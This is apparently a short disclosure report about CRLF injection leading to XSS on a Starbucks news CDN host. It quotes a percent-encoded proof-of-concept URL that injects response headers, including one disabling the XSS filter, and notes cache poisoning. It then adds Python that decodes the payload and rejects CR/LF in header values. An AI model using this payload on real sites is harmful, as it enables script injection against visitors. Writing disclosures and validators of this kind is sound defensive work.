Starbucks: [newscdn.starbucks.com] CRLF Injection, XSS
PoC Firefox

http://newscdn.starbucks.com/%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23%0d%0a%0d%0a0%0d%0a/%2e%2e

After sending the request through Firefox, this query is saved in the cache and, using a small trick, can be made to work in another browser.

PoC Chrome

Make sure you send...
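
Decoding the Firefox PoC path shows which header lines it carries, and the check that follows is the server-side rejection that stops them. This is an added example, not code from the report or from Starbucks; it assumes the server copied the request path into a response header (the excerpt does not say which one), and all function names are hypothetical.

```python
from urllib.parse import unquote

# Path component of the Firefox PoC URL quoted in the report (host removed).
POC_PATH = ("/%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0"
            "%0d%0a%0d%0a23%0d%0a%0d%0a0%0d%0a/%2e%2e")


def decode_fully(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded input (%250d) is also seen."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def injected_header_lines(path):
    """Header lines an unsanitised reflection of `path` would add to a response."""
    decoded = decode_fully(path)
    # Everything up to the first blank line is parsed as headers by the client.
    head, _, _ = decoded.partition("\r\n\r\n")
    # The first element is the legitimate start of the value, not an injected line.
    return [line for line in head.split("\r\n")[1:] if ":" in line]


def safe_header_value(value):
    """Return `value` unchanged, or raise if it decodes to anything with CR or LF."""
    decoded = decode_fully(value)
    if "\r" in decoded or "\n" in decoded:
        raise ValueError("CR/LF in value destined for a response header")
    return value


if __name__ == "__main__":
    print(injected_header_lines(POC_PATH))
    try:
        safe_header_value(POC_PATH)
    except ValueError as exc:
        print("rejected:", exc)
```

The `X-XSS-Protection:0` line among the injected headers is what switches off the browser's XSS filter for the reflected response.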